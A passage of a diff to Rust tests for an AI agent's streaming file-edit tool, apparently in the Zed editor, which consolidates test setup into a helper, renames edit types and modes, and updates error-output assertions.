.await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit multiple lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - EditOperation { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit multiple lines".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + ]), + }), ToolCallEventStream::test().0, cx, ) @@ -1370,57 +1369,30 @@ mod tests { #[gpui::test] async fn test_streaming_edit_adjacent_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit adjacent lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }, - EditOperation { - old_text: "line 3".into(), - new_text: "modified line 3".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit adjacent lines".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }, + Edit { + old_text: "line 3".into(), + new_text: "modified line 3".into(), + }, + ]), + }), ToolCallEventStream::test().0, cx, ) @@ -1438,57 +1410,30 @@ mod tests { #[gpui::test] async fn test_streaming_edit_ascending_order_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit multiple lines in ascending order".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 1".into(), - new_text: "modified line 1".into(), - }, - EditOperation { - old_text: "line 5".into(), - new_text: "modified line 5".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit multiple lines in ascending order".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + ]), + }), ToolCallEventStream::test().0, cx, ) @@ -1506,106 +1451,63 @@ mod tests { #[gpui::test] async fn test_streaming_edit_nonexistent_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Some edit".into(), - path: "root/nonexistent_file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![EditOperation { - old_text: "foo".into(), - new_text: "bar".into(), - }]), - }; - Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Some edit".into(), + path: "root/nonexistent_file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "foo".into(), + new_text: "bar".into(), + }]), + }), ToolCallEventStream::test().0, cx, ) }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; assert_eq!(error, "Can't edit file: path not found"); + assert!(diff.is_empty()); + assert_eq!(input_path, None); } #[gpui::test] async fn test_streaming_edit_failed_match(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"file.txt": "hello world"})) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![EditOperation { - old_text: "nonexistent text that is not in the file".into(), - new_text: "replacement".into(), - }]), - }; - Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit file".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "nonexistent text that is not in the file".into(), + new_text: "replacement".into(), + }]), + }), ToolCallEventStream::test().0, cx, ) }) .await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { panic!("expected error"); }; assert!( @@ -1615,126 +1517,22 @@ mod tests { } #[gpui::test] - async fn test_streaming_edit_overlapping_edits_out_of_order(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - // Multi-line file so the line-based fuzzy matcher can resolve each edit. - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); + async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - // Edit A spans lines 3-4, edit B spans lines 2-3. They overlap on - // "line 3" and are given in descending file order so the ascending - // sort must reorder them before the pairwise overlap check can - // detect them correctly. - let result = cx - .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Overlapping edits".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![ - EditOperation { - old_text: "line 3\nline 4".into(), - new_text: "SECOND".into(), - }, - EditOperation { - old_text: "line 2\nline 3".into(), - new_text: "FIRST".into(), - }, - ]), - }; - Arc::new(StreamingEditFileTool::new( - project, - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; + // Send partials simulating LLM streaming: description first, then path, then mode + sender.send_partial(json!({"display_description": "Edit lines"})); + cx.run_until_parked(); - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("Conflicting edit ranges detected"), - "Expected 'Conflicting edit ranges detected' but got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Send partials simulating LLM streaming: description first, then path, then mode - sender.send_partial(json!({"display_description": "Edit lines"})); - cx.run_until_parked(); - - sender.send_partial(json!({ - "display_description": "Edit lines", - "path": "root/file.txt" - })); - cx.run_until_parked(); + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt" + })); + cx.run_until_parked(); // Path is NOT yet complete because mode hasn't appeared — no buffer open yet sender.send_partial(json!({ @@ -1745,7 +1543,7 @@ mod tests { cx.run_until_parked(); // Now send the final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", @@ -1761,42 +1559,11 @@ mod tests { #[gpui::test] async fn test_streaming_path_completeness_heuristic(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send partial with path but NO mode — path should NOT be treated as complete sender.send_partial(json!({ @@ -1809,15 +1576,15 @@ mod tests { sender.send_partial(json!({ "display_description": "Overwrite file", "path": "root/file.txt", - "mode": "overwrite" + "mode": "write" })); cx.run_until_parked(); // Send final - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Overwrite file", "path": "root/file.txt", - "mode": "overwrite", + "mode": "write", "content": "new content" })); @@ -1830,43 +1597,12 @@ mod tests { #[gpui::test] async fn test_streaming_cancellation_during_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver, mut cancellation_tx) = ToolCallEventStream::test_with_cancellation(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send a partial sender.send_partial(json!({"display_description": "Edit"})); @@ -1881,7 +1617,7 @@ mod tests { drop(sender); let result = task.await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { error, .. } = result.unwrap_err() else { panic!("expected error"); }; assert!( @@ -1892,42 +1628,14 @@ mod tests { #[gpui::test] async fn test_streaming_edit_with_multiple_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Simulate fine-grained streaming of the JSON sender.send_partial(json!({"display_description": "Edit multiple"})); @@ -1966,7 +1674,7 @@ mod tests { cx.run_until_parked(); // Send final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", @@ -1988,36 +1696,10 @@ mod tests { #[gpui::test] async fn test_streaming_create_file_with_partials(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream partials for create mode sender.send_partial(json!({"display_description": "Create new file"})); @@ -2026,23 +1708,23 @@ mod tests { sender.send_partial(json!({ "display_description": "Create new file", "path": "root/dir/new_file.txt", - "mode": "create" + "mode": "write" })); cx.run_until_parked(); sender.send_partial(json!({ "display_description": "Create new file", "path": "root/dir/new_file.txt", - "mode": "create", + "mode": "write", "content": "Hello, " })); cx.run_until_parked(); // Final with full content - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Create new file", "path": "root/dir/new_file.txt", - "mode": "create", + "mode": "write", "content": "Hello, World!" })); @@ -2055,45 +1737,14 @@ mod tests { #[gpui::test] async fn test_streaming_no_partials_direct_final(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Send final immediately with no partials (simulates non-streaming path) - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit lines", "path": "root/file.txt", "mode": "edit", @@ -2109,42 +1760,14 @@ mod tests { #[gpui::test] async fn test_streaming_incremental_edit_application(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + let (tool, project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Stream description, path, mode sender.send_partial(json!({"display_description": "Edit multiple lines"})); @@ -2212,7 +1835,7 @@ mod tests { ); // Send final complete input - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit multiple lines", "path": "root/file.txt", "mode": "edit", @@ -2238,42 +1861,11 @@ mod tests { #[gpui::test] async fn test_streaming_incremental_three_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "aaa\nbbb\nccc\nddd\neee\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "aaa\nbbb\nccc\nddd\neee\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup: description + path + mode sender.send_partial(json!({ @@ -2304,14 +1896,16 @@ mod tests { })); cx.run_until_parked(); - // Verify edit 1 applied + // Verify edit 1 fully applied. Edit 2's new_text is being + // streamed: "CCC" is inserted but the old "ccc" isn't deleted + // yet (StreamingDiff::finish runs when edit 3 marks edit 2 done). let buffer_text = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) .unwrap(); project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nccc\nddd\neee\n")); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCCccc\nddd\neee\n")); // Edit 3 appears — edit 2 is now complete and should be applied sender.send_partial(json!({ @@ -2326,17 +1920,18 @@ mod tests { })); cx.run_until_parked(); - // Verify edits 1 and 2 both applied + // Verify edits 1 and 2 fully applied. Edit 3's new_text is being + // streamed: "EEE" is inserted but old "eee" isn't deleted yet. let buffer_text = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) .unwrap(); project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) }); - assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\neee\n")); + assert_eq!(buffer_text.as_deref(), Some("AAA\nbbb\nCCC\nddd\nEEEeee\n")); // Send final - sender.send_final(json!({ + sender.send_full(json!({ "display_description": "Edit three lines", "path": "root/file.txt", "mode": "edit", @@ -2356,42 +1951,11 @@ mod tests { #[gpui::test] async fn test_streaming_edit_failure_mid_stream(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); // Setup sender.send_partial(json!({ @@ -2425,16 +1989,17 @@ mod tests { })); cx.run_until_parked(); - // Verify edit 1 was applied - let buffer_text = project.update(cx, |project, cx| { + let buffer = project.update(cx, |project, cx| { let pp = project .find_project_path(&PathBuf::from("root/file.txt"), cx) .unwrap(); - project.get_open_buffer(&pp, cx).map(|b| b.read(cx).text()) + project.get_open_buffer(&pp, cx).unwrap() }); + + // Verify edit 1 was applied + let buffer_text = buffer.read_with(cx, |buffer, _cx| buffer.text()); assert_eq!( - buffer_text.as_deref(), - Some("MODIFIED\nline 2\nline 3\n"), + buffer_text, "MODIFIED\nline 2\nline 3\n", "First edit should be applied even though second edit will fail" ); @@ -2457,131 +2022,43 @@ mod tests { drop(sender); let result = task.await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { + let StreamingEditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { panic!("expected error"); }; + assert!( error.contains("Could not find matching text for edit at index 1"), "Expected error about edit 1 failing, got: {error}" ); + // Ensure that first edit was applied successfully and that we saved the buffer + assert_eq!(input_path, Some(PathBuf::from("root/file.txt"))); + assert_eq!( + diff, + "@@ -1,3 +1,3 @@\n-line 1\n+MODIFIED\n line 2\n line 3\n" + ); } #[gpui::test] - async fn test_streaming_overlapping_edits_detected_naturally(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); + async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { + let (tool, project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world\n"})).await; + let (mut sender, input) = ToolInput::::test(); let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Setup - sender.send_partial(json!({ - "display_description": "Overlapping edits", - "path": "root/file.txt", - "mode": "edit" - })); - cx.run_until_parked(); - - // Edit 1 targets "line 1\nline 2" and replaces it. - // Edit 2 targets "line 2\nline 3" — but after edit 1 is applied, - // "line 2" has been removed so this should fail to match. - // Edit 3 exists to make edit 2 "complete" during streaming. + // Setup + single edit that stays in-progress (no second edit to prove completion) sender.send_partial(json!({ - "display_description": "Overlapping edits", + "display_description": "Single edit", "path": "root/file.txt", "mode": "edit", - "edits": [ - {"old_text": "line 1\nline 2", "new_text": "REPLACED"}, - {"old_text": "line 2\nline 3", "new_text": "ALSO REPLACED"}, - {"old_text": "line 3", "new_text": "DUMMY"} - ] })); cx.run_until_parked(); - // Edit 1 was applied, edit 2 should fail since "line 2" no longer exists - drop(sender); - - let result = task.await; - let StreamingEditFileToolOutput::Error { error } = result.unwrap_err() else { - panic!("expected error"); - }; - assert!( - error.contains("Could not find matching text for edit at index 1"), - "Expected overlapping edit to fail naturally, got: {error}" - ); - } - - #[gpui::test] - async fn test_streaming_single_edit_no_incremental(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "hello world\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - - let (sender, input) = ToolInput::::test(); - let (event_stream, _receiver) = ToolCallEventStream::test(); - - let tool = Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )); - - let task = cx.update(|cx| tool.run(input, event_stream, cx)); - - // Setup + single edit that stays in-progress (no second edit to prove completion) sender.send_partial(json!({ "display_description": "Single edit", "path": 